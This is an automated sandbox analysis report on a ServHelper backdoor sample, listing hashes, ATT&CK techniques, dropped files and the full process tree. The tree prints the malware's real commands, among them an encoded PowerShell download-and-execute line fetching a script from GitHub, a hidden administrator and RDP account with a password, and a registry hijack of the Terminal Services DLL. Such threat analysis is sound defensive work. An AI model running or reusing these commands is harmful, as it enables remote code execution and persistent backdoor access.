servhelper | 046f08e500cc9156c4af47a73744ccb060606c77d7a8beb5677aa6ff4d256211

Analysis

max time kernel
124s
max time network
122s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
10-04-2024 09:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

046f08e500cc9156c4af47a73744ccb060606c77d7a8beb5677aa6ff4d256211.exe
Size

5.9MB
MD5

f71c575754e1f5890ad8b35afd08b8be
SHA1

69803b96f3820fabd81c79d422a1fa2a72ccb699
SHA256

046f08e500cc9156c4af47a73744ccb060606c77d7a8beb5677aa6ff4d256211
SHA512

32f7fab593c46efe2586825aff79688e4a688735bf950b351fe3bdffc4a9dff01da0b2d4a92acf4d4bd14aac362884bd264beced9e8b82fd3111e8ef8ef31301
SSDEEP

49152:1Hjgzprb/TkvO90dL3BmAFd4A64nsfJ9X559RIO3CV7rfM2Zy4oaBqn4BHXVpetO:1H6/X5mAQQQQQQQQQQQQQ

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow	pid	Process
7	1208	powershell.exe
8	1208	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Possible privilege escalation attempt 8 IoCs

exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exe

pid	Process
2788	icacls.exe
2792	icacls.exe
1196	icacls.exe
3000	icacls.exe
2968	icacls.exe
2288	takeown.exe
3052	icacls.exe
2664	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

Processes:

pid	Process
1776
1776

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exe

pid	Process
2792	icacls.exe
1196	icacls.exe
3000	icacls.exe
2968	icacls.exe
2288	takeown.exe
3052	icacls.exe
2664	icacls.exe
2788	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/files/0x00110000000155d4-100.dat	upx
behavioral1/files/0x000a000000015e5b-101.dat	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

Processes:

flow	ioc
6	raw.githubusercontent.com
7	raw.githubusercontent.com
8	raw.githubusercontent.com

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	Process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Windows directory 9 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	Process
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DY51024G3EI4T2LFAGPE.temp	powershell.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

Processes:

WMIC.exe

pid	Process
1192	WMIC.exe

Modifies data under HKEY_USERS 4 IoCs

Processes:

powershell.exeWMIC.exeWMIC.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 703cacc1288bda01	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

Processes:

reg.exe

pid	Process
936	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
2552	powershell.exe
2852	powershell.exe
532	powershell.exe
2640	powershell.exe
2552	powershell.exe
2552	powershell.exe
2552	powershell.exe
1208	powershell.exe

Suspicious behavior: LoadsDriver 5 IoCs

Processes:

pid	Process
468
1776
1776
1776
1776

Suspicious use of AdjustPrivilegeToken 19 IoCs

Processes:

046f08e500cc9156c4af47a73744ccb060606c77d7a8beb5677aa6ff4d256211.exepowershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	1760	046f08e500cc9156c4af47a73744ccb060606c77d7a8beb5677aa6ff4d256211.exe
Token: SeDebugPrivilege	2552	powershell.exe
Token: SeDebugPrivilege	2852	powershell.exe
Token: SeDebugPrivilege	532	powershell.exe
Token: SeDebugPrivilege	2640	powershell.exe
Token: SeRestorePrivilege	2664	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	1192	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1192	WMIC.exe
Token: SeAuditPrivilege	1192	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1192	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1192	WMIC.exe
Token: SeAuditPrivilege	1192	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2436	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2436	WMIC.exe
Token: SeAuditPrivilege	2436	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2436	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2436	WMIC.exe
Token: SeAuditPrivilege	2436	WMIC.exe
Token: SeDebugPrivilege	1208	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

046f08e500cc9156c4af47a73744ccb060606c77d7a8beb5677aa6ff4d256211.exepowershell.execsc.exenet.execmd.execmd.exe

description	pid	Process	procid_target
PID 1760 wrote to memory of 2552	1760	046f08e500cc9156c4af47a73744ccb060606c77d7a8beb5677aa6ff4d256211.exe	29
PID 1760 wrote to memory of 2552	1760	046f08e500cc9156c4af47a73744ccb060606c77d7a8beb5677aa6ff4d256211.exe	29
PID 1760 wrote to memory of 2552	1760	046f08e500cc9156c4af47a73744ccb060606c77d7a8beb5677aa6ff4d256211.exe	29
PID 2552 wrote to memory of 2224	2552	powershell.exe	31
PID 2552 wrote to memory of 2224	2552	powershell.exe	31
PID 2552 wrote to memory of 2224	2552	powershell.exe	31
PID 2224 wrote to memory of 2536	2224	csc.exe	32
PID 2224 wrote to memory of 2536	2224	csc.exe	32
PID 2224 wrote to memory of 2536	2224	csc.exe	32
PID 2552 wrote to memory of 2852	2552	powershell.exe	33
PID 2552 wrote to memory of 2852	2552	powershell.exe	33
PID 2552 wrote to memory of 2852	2552	powershell.exe	33
PID 2552 wrote to memory of 532	2552	powershell.exe	35
PID 2552 wrote to memory of 532	2552	powershell.exe	35
PID 2552 wrote to memory of 532	2552	powershell.exe	35
PID 2552 wrote to memory of 2640	2552	powershell.exe	37
PID 2552 wrote to memory of 2640	2552	powershell.exe	37
PID 2552 wrote to memory of 2640	2552	powershell.exe	37
PID 2552 wrote to memory of 2288	2552	powershell.exe	41
PID 2552 wrote to memory of 2288	2552	powershell.exe	41
PID 2552 wrote to memory of 2288	2552	powershell.exe	41
PID 2552 wrote to memory of 3052	2552	powershell.exe	42
PID 2552 wrote to memory of 3052	2552	powershell.exe	42
PID 2552 wrote to memory of 3052	2552	powershell.exe	42
PID 2552 wrote to memory of 2664	2552	powershell.exe	43
PID 2552 wrote to memory of 2664	2552	powershell.exe	43
PID 2552 wrote to memory of 2664	2552	powershell.exe	43
PID 2552 wrote to memory of 2788	2552	powershell.exe	44
PID 2552 wrote to memory of 2788	2552	powershell.exe	44
PID 2552 wrote to memory of 2788	2552	powershell.exe	44
PID 2552 wrote to memory of 2792	2552	powershell.exe	45
PID 2552 wrote to memory of 2792	2552	powershell.exe	45
PID 2552 wrote to memory of 2792	2552	powershell.exe	45
PID 2552 wrote to memory of 1196	2552	powershell.exe	46
PID 2552 wrote to memory of 1196	2552	powershell.exe	46
PID 2552 wrote to memory of 1196	2552	powershell.exe	46
PID 2552 wrote to memory of 3000	2552	powershell.exe	47
PID 2552 wrote to memory of 3000	2552	powershell.exe	47
PID 2552 wrote to memory of 3000	2552	powershell.exe	47
PID 2552 wrote to memory of 2968	2552	powershell.exe	48
PID 2552 wrote to memory of 2968	2552	powershell.exe	48
PID 2552 wrote to memory of 2968	2552	powershell.exe	48
PID 2552 wrote to memory of 1980	2552	powershell.exe	49
PID 2552 wrote to memory of 1980	2552	powershell.exe	49
PID 2552 wrote to memory of 1980	2552	powershell.exe	49
PID 2552 wrote to memory of 936	2552	powershell.exe	50
PID 2552 wrote to memory of 936	2552	powershell.exe	50
PID 2552 wrote to memory of 936	2552	powershell.exe	50
PID 2552 wrote to memory of 436	2552	powershell.exe	51
PID 2552 wrote to memory of 436	2552	powershell.exe	51
PID 2552 wrote to memory of 436	2552	powershell.exe	51
PID 2552 wrote to memory of 2024	2552	powershell.exe	52
PID 2552 wrote to memory of 2024	2552	powershell.exe	52
PID 2552 wrote to memory of 2024	2552	powershell.exe	52
PID 2024 wrote to memory of 1960	2024	net.exe	53
PID 2024 wrote to memory of 1960	2024	net.exe	53
PID 2024 wrote to memory of 1960	2024	net.exe	53
PID 2552 wrote to memory of 968	2552	powershell.exe	54
PID 2552 wrote to memory of 968	2552	powershell.exe	54
PID 2552 wrote to memory of 968	2552	powershell.exe	54
PID 968 wrote to memory of 1376	968	cmd.exe	55
PID 968 wrote to memory of 1376	968	cmd.exe	55
PID 968 wrote to memory of 1376	968	cmd.exe	55
PID 1376 wrote to memory of 1304	1376	cmd.exe	56

C:\Users\Admin\AppData\Local\Temp\046f08e500cc9156c4af47a73744ccb060606c77d7a8beb5677aa6ff4d256211.exe
"C:\Users\Admin\AppData\Local\Temp\046f08e500cc9156c4af47a73744ccb060606c77d7a8beb5677aa6ff4d256211.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1760
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2552
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\8de6xi_a.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2224
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES983B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC983A.tmp"
      4⤵
      PID:2536
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2852
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:532
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2640
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2288
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3052
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2664
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2788
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2792
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1196
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3000
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2968
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:1980
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Sets DLL path for service in the registry
    - Modifies registry key
    PID:936
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:436
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2024
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:1960
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:968
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1376
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        
        PID:1304
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:2240
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    PID:1348
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      PID:1916
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        
        PID:1500
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:1772
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:2656
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:292

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
PID:844
- C:\Windows\system32\net.exe
  net.exe user wgautilacc Ghar4f5 /del
  2⤵
  PID:964
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
    3⤵
    PID:2976

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc OjBTxO4x /add
1⤵
PID:2840
- C:\Windows\system32\net.exe
  net.exe user wgautilacc OjBTxO4x /add
  2⤵
  PID:2836
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc OjBTxO4x /add
    3⤵
    PID:2328

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
PID:1700
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  2⤵
  PID:2880
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    3⤵
    PID:1008

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" KXIPPCKF$ /ADD
1⤵
PID:872
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" KXIPPCKF$ /ADD
  2⤵
  PID:1592
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" KXIPPCKF$ /ADD
    3⤵
    PID:2332

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
PID:836
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  2⤵
  PID:1516
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
    3⤵
    PID:1588

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc OjBTxO4x
1⤵
PID:1584
- C:\Windows\system32\net.exe
  net.exe user wgautilacc OjBTxO4x
  2⤵
  PID:2608
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc OjBTxO4x
    3⤵
    PID:2576

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:2600
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1192

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:2052
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2436

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:2500
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:2860
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1208

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\8de6xi_a.dll

Filesize
3KB

MD5
cbc44d445caa7c961bec6dcab1ae4279

SHA1
8f6107e2a660353d0bf243bbdb20047e0bb7ee6d

SHA256
466acc4017a1d4906c54367730bb7fce82afa5e0e0d6f7758c188d1792f16536

SHA512
08aa36e04a921258bd4a16f07dbcb8b80f6cc08601ef6a7a197ed2b523915ca1afd33723c8755ed7550f90a6f9b88cf2bfe4c681e0413114e73a1edde5a6a765

Download Submit
C:\Users\Admin\AppData\Local\Temp\8de6xi_a.pdb

Filesize
7KB

MD5
4509b82b667bcc3c6f48e0e1cab70652

SHA1
af3d40dc739241e440f2ef4eb614c0cb997c2978

SHA256
fa4a6f6ff272705e38e9fb8281d9291d0e411758d78e4eef1a98fdb187ea5eb4

SHA512
c83406cc673b7d66d1aafd726341ea3c7d35ec9adfd60ffaeb32861efaccebc3919d77b2d80ef9b312f0a1433d210baba63c2f734bcdb54d7e59afab00cabd33

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES983B.tmp

Filesize
1KB

MD5
f7f9d8e7a81b15bc47f55754ec2a4605

SHA1
56b79cdad89dda4ecd7091417d125e2c20775459

SHA256
eed9fded330b00bb38f6e5466b415e007248adc58413a9f14f4ba84ef86c1c68

SHA512
3a7ee95f66130980bdda98563fc419c50ac94fcda3d6fdafcf391ea555857b8f9758294980d603f8910a52d4ea815d258bf1ec16aa62f0328a9f9425cf2b3024

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

Filesize
2.5MB

MD5
78fc438bc0a10f68012273374fc242de

SHA1
1c2f8f958b4cfb2d822a50f97c1b503d039108d4

SHA256
14249168e782173812af05b444b582847646a69623a3254b8a590ba00365b4e0

SHA512
97d287f9e1ac939505e3ff2b7d6854ae838dd4f0cc3699d157912dcbb116b709b30580baac4c4ce7a5384e28de841dd44f12006c4857bc6a72bc8758427f280e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
99a0c232ca0e215f7b58e50e9a6fc55e

SHA1
2f45495089bc1fc81d42bfa4fda59f67680edb8a

SHA256
45d8d41e966c204cf4a841780a8bcae51bc9deeda64b9cb9fff220041b15516d

SHA512
3251461b409a7669f42052a52222f4f0633d886b7332257c97cef298b81c2630163a3b0fad191feba6ad2b4d9ee0a9763457bd2ff43ac3385aba79ebd2d5c2cd

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\8de6xi_a.0.cs

Filesize
424B

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\8de6xi_a.cmdline

Filesize
309B

MD5
539778df9c962b387822d6a768ced6af

SHA1
111fef273d2b8ed0d76b279a2fec3be9e24ab3ea

SHA256
16977c1eeb9ab79c648cdc062d2a51ad525a059abddf7a7b188538f5f74b4e7a

SHA512
47fe06c48f762b60fd987e74bc2b2575e9788ccd1a368fcfe9f4084c23759619d1307ce7af70259360136a35e90ffe6712c623b13e41487fcf7b8cd942d0706d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC983A.tmp

Filesize
652B

MD5
0a6ad20a764da104ee2df81b65932384

SHA1
1f5b53beaebad2e5b6199f88f9e9ef6aad682c8c

SHA256
2ea2333d64ebad1b0e9fa3b66a97e4b1e4edb15b9c61e371fe3ba0766f91507c

SHA512
de9783619251b6c35d8aa081ad2202d0c63ea4fa187b6e620f2e5cc4b7b8cffad1f89a1e03e4b694a4348278d8c1ad2cf9f2a91acb202dfa82b30371c07345f7

Download Submit
\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
07044622ac01aea214d75af177a9976f

SHA1
8647e016414d4ef1da52abcf889210f15c58a640

SHA256
e83dc368abf546e72a528509e3d2fd8e83153f783832abcef014cddb9da002e9

SHA512
21b30facf460b9c93d32e1a54d6e5e2578f49c782eb3325268f83ad9beb14dd2c06b9b8337161099a69c1ad082583fdf94d20c7c4e2c91063e6bc0e6c9664324

Download Submit
\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
7c2b6a91963747383e5cdb168539962c

SHA1
cd987c6f69702bf0369b4c49c898052fae21d513

SHA256
fc3c17833725d727590ef00fdf3f8d70f52d4c13a9cf52a77b6e74e22d7dae61

SHA512
8a952e2e7ac644cb73bc35f1d099f8c9590027f5e5f89771131025ce878c000fec1aeaf708113889e1044094ebbc311ee46f945cca6946860705edac4eec8141

Download Submit
memory/532-61-0x000007FEED5A0000-0x000007FEEDF3D000-memory.dmp

Filesize
9.6MB

Download
memory/532-64-0x0000000002A1C000-0x0000000002A83000-memory.dmp

Filesize
412KB

Download
memory/532-66-0x000007FEED5A0000-0x000007FEEDF3D000-memory.dmp

Filesize
9.6MB

Download
memory/532-62-0x0000000002A10000-0x0000000002A90000-memory.dmp

Filesize
512KB

Download
memory/532-65-0x0000000002A10000-0x0000000002A90000-memory.dmp

Filesize
512KB

Download
memory/532-63-0x000007FEED5A0000-0x000007FEEDF3D000-memory.dmp

Filesize
9.6MB

Download
memory/1208-111-0x000007FEED5A0000-0x000007FEEDF3D000-memory.dmp

Filesize
9.6MB

Download
